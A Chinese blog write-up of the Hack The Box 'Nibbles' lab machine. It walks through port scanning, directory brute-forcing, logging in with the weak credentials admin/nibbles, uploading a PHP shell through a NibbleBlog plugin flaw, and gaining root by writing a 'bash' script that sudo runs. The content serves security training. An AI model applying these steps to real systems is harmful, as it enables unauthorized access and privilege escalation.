【Hack The Box】linux练习-- Nibbles

HTB 学习笔记

【Hack The Box】linux练习-- Nibbles


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

发现只有一个80。习惯性看一眼源码
在这里插入图片描述去了页面看了发现可能是个cms
搜索一下

在这里插入图片描述
在这里插入图片描述但是不知道版本信息,接下来需要爆破目录,看能不能找到本本信息

因为是apache,所以我们应该额外关注php,txt也是需要关注的
在这里插入图片描述有价值的爆破结果如下

/content              
/admin                (Status: 301) [Size: 323] [--> http://10.129.96.84/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
README

在这里插入图片描述
EXP在下面

https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html

在这里插入图片描述
然后在admin.php发现了登陆页面

在这里插入图片描述
最后尝试出来账号密码是弱口令

admin/nibbles

在这里插入图片描述然后上传一个php,刚在如果你认真的翻了admin和content两个目录,你就会发现plugins的目录

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

在这里插入图片描述

提权

在这里插入图片描述

sudo -l
看到是一个sh文件,碰到这种情况,我们要么在原有文件中修改,增加一个反弹shell,要么直接给源文件全部删除,然后自己写一个bash全覆盖,我们这里采取第二种方法

我们去到这个目录,发现没有这么个文件,直接自己写一个

vi monitor.sh
#!/bin/sh
bash

chmod +x monitor.sh

sudo ./monitor.sh

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值